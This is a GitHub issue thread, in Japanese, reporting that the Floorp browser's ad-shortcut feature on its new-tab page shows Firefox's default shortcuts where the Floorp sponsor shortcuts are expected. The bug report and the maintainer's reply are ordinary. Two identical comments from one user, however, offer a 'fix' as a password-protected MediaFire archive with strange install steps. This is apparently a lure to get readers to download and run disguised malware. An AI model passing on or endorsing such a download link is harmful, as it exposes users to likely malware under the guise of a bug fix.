### ISSUE TITLE
[Bug]: 広告ショートカットが Firefox 由来のものになっている

### ISSUE THREAD

**Issue by CutterKnife** [Floorp-Projects/Floorp#1408]
### Pre-Submission Checklist

- [X] I have checked the existing/closed issues to ensure this issue has not already been reported.
- [X] I am using the latest supported version of the browser.
- [ ] I have tried disabling all browser extensions/add-ons to rule out interference from these.
- [ ] I have tried clearing the browser cache and cookies.
- [X] I have checked with a new profile and the issue still occurs.
- [X] I have provided detailed step-by-step instructions on how to reproduce the issue.
- [X] I have included relevant screenshots or console outputs.
- [ ] I have checked that this problem is not occurring in the latest version of Firefox ESR.
- [X] This issue is specific to this browser and does not occur in other browsers.

### Bug Summary

Firefox の広告ショートカットを Floorp のスペシャルスポンサーに置き換える機能がありますが、現在は機能していないように見えます。

### Reproduction Steps

1. Floorp Home (既定の新しいタブ) を開く
2. 右上の設定アイコンから「広告ショートカット」を有効にする

### Expected Behavior

スペシャルスポンサーのショートカットが表示されます。

### Actual Behavior

Amazon などのサービスのショートカットが表示されます。

### Screenshots

![image](https://github.com/user-attachments/assets/f7c4fc55-f212-45ab-883f-dccf7662e516)

### Browser Version

11.17.8 (64-bit, Apple Silicon)

### Operating System

macOS Sonoma 14.6.1, Windows 11 Arm 23H2 (Virtual, ライセンス未認証)

### Additional Context

検証が不完全なので、もしかしたらおま環かもしれません……

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by surapunoyousei** [comment]
あ、これ直さないと
